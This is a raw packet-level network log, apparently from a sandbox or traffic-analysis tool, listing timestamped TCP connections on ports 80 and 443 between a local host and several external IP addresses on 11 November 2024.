                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725863934 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.725899935 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.759597063 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.759664059 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.759799957 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.759821892 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.759824991 CET44354680188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.760097980 CET54680443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.863095045 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:54.867969036 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.237633944 CET8049740188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.237760067 CET4974080192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.247191906 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.247236967 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.247297049 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.247584105 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.247601986 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.680782080 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.680845976 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.682807922 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.682812929 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.683070898 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.683125019 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.683515072 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:55.731329918 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118488073 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118532896 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118537903 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118571043 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118612051 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.118612051 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119132996 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119177103 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119183064 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119225025 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119909048 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119951963 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119956017 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119961977 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.119981050 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.120009899 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.121093988 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.121133089 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.121140003 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.121181965 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.121973038 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.122024059 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.122189045 CET44354701188.114.97.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.122226954 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.122265100 CET54701443192.168.2.6188.114.97.3
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.150166035 CET5472480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.158094883 CET8054724103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.158163071 CET5472480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.165591002 CET5472480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.172884941 CET8054724103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.237823963 CET5472580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.246038914 CET8054725103.224.182.252192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.246093035 CET5472580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.251365900 CET5472580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.258730888 CET8054725103.224.182.252192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.263794899 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.269808054 CET8049796154.85.183.50192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.559613943 CET8049796154.85.183.50192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.559668064 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.589523077 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.594408989 CET8049796154.85.183.50192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.867031097 CET8054724103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.867086887 CET5472480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.867924929 CET8054724103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.867937088 CET8053397199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.867944956 CET8054724103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.867954969 CET8054725103.224.182.252192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.867980003 CET5472480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.868002892 CET5472480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.868021011 CET5339780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.868021011 CET5472580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.869946957 CET5472480192.168.2.6103.224.212.210
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.870307922 CET5472580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.870515108 CET4980280192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.870759010 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.874177933 CET8049796154.85.183.50192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.874228954 CET4979680192.168.2.6154.85.183.50
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.875011921 CET8054724103.224.212.210192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.875499964 CET804980264.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.877202988 CET8054725103.224.182.252192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.877213955 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.877249956 CET5472580192.168.2.6103.224.182.252
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.877275944 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.877432108 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.882563114 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.883105040 CET4980880192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.883361101 CET5473080192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.888087034 CET8049808199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.888185024 CET8054730199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.888251066 CET5473080192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.888362885 CET5473080192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.893563986 CET8054730199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.314130068 CET8054730199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.314196110 CET5473080192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.314394951 CET8054730199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.314438105 CET5473080192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519500971 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519623041 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519627094 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519639969 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519670963 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519681931 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520042896 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520056963 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520111084 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520112038 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520466089 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520478964 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520489931 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520545006 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520545006 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.521085978 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.521099091 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.525322914 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.531991959 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.532248020 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.532255888 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.532371044 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.601464033 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.601619959 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.601632118 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.601650953 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.601952076 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.602118015 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.602173090 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.602859974 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.602871895 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.602883101 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.602911949 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.603013039 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.603672028 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.603696108 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.603704929 CET805472964.190.63.136192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.603868961 CET5472980192.168.2.664.190.63.136
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.214572906 CET5376480192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.219834089 CET805376472.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.219896078 CET5376480192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.220251083 CET5376480192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.225400925 CET805376472.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.715842009 CET805376472.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.715915918 CET5376480192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.715977907 CET5376480192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.720757961 CET805376472.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.735559940 CET5376680192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.740714073 CET805376672.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.740858078 CET5376680192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.741349936 CET5376680192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.746773958 CET805376672.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.146442890 CET5377280192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.151350975 CET8053772162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.154181957 CET5377280192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.183851004 CET5377280192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.188872099 CET8053772162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.202766895 CET5377380192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.207634926 CET805377399.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.208868980 CET5377380192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.210110903 CET5377380192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.212646008 CET5377480192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.214989901 CET805377399.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.217706919 CET805377444.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.217767954 CET5377480192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.229973078 CET5377480192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.235754013 CET805377444.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.257040977 CET805376672.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.257245064 CET5376680192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.257534981 CET5376680192.168.2.672.52.179.174
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.263144016 CET805376672.52.179.174192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.410123110 CET5377680192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.411164045 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.414974928 CET8053776208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.415050983 CET5377680192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.416268110 CET8053777199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.416435957 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.431566000 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.436651945 CET8053777199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.490645885 CET5377680192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.497884035 CET8053776208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.629034996 CET5211980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.644588947 CET805377399.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.644661903 CET80521193.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.644675970 CET5377380192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.644742966 CET5211980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.644942999 CET5377380192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.645026922 CET5211980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.649893999 CET80521193.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.651643991 CET805377399.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.652604103 CET5377380192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.652961016 CET805377444.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.653220892 CET5377480192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.657032967 CET52120443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.657063961 CET4435212099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.657747984 CET52120443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.659411907 CET805377444.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.659550905 CET5377480192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.661029100 CET5377480192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.666484118 CET805377444.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.670015097 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.670021057 CET5212280192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.670552969 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.674902916 CET805212144.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.674913883 CET8052122199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.675009012 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.675071955 CET5212280192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.675200939 CET5212480192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.675390959 CET8052123208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.675772905 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.676589012 CET5212280192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.676775932 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.676995039 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.679945946 CET8052124162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.680696964 CET5212480192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.680701017 CET5212580192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.681401014 CET8052122199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.681536913 CET8052123208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.681833982 CET805212144.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.685029030 CET5212680192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.685753107 CET8052125178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.686229944 CET8053772162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.687438011 CET5212480192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.687438011 CET5377280192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.687442064 CET5212580192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.687581062 CET5212580192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.690100908 CET8052126188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.691116095 CET5212680192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.691417933 CET5212680192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.692812920 CET8052124162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.692843914 CET8052125178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.696727991 CET8052126188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.699528933 CET52120443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.699561119 CET4435212099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.724939108 CET5212780192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.729906082 CET8052127178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.733166933 CET5212780192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.754053116 CET5212880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.759136915 CET8052128188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.759383917 CET5212880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.787517071 CET5212880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.792390108 CET8052128188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.817025900 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.821933031 CET805212918.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.822252989 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.822654963 CET5212980192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.827889919 CET805212918.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.851334095 CET8053777199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.851399899 CET8053777199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.851433992 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.851632118 CET5377780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.871604919 CET8053776208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.871819973 CET5377680192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.036108971 CET5213280192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.037019968 CET5213380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.041081905 CET8052132178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.041887999 CET8052133199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.042418957 CET5213380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.042427063 CET5213280192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.045324087 CET5213380192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.050333977 CET8052133199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.076699018 CET80521193.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.077020884 CET5211980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122396946 CET8052122199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122451067 CET8052122199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122596025 CET805212144.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122626066 CET5212280192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122914076 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.123620033 CET80521193.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.123730898 CET5211980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.128988981 CET8052123208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.129381895 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.131521940 CET8052125178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.131679058 CET805212144.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.131695986 CET5212580192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.131784916 CET5212180192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.138339043 CET4435212099.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.138484001 CET52120443192.168.2.699.83.170.3
